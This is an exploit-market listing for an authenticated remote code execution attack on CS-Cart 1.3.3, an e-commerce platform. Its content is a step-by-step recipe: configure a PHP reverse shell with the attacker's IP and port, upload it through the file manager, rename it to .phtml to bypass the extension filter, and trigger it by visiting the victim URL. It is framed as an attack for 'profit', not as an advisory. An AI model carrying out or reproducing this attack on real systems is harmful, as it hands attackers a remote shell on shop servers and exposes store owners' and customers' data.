[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CS-Cart 1.3.3 - authenticated RCE Vulnerability

Author
0xmmnbassel
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-35049
Category
web applications
Date add
16-10-2020
Platform
php
# Exploit Title: CS-Cart authenticated RCE
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE



get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!

#  0day.today [2024-12-24]  #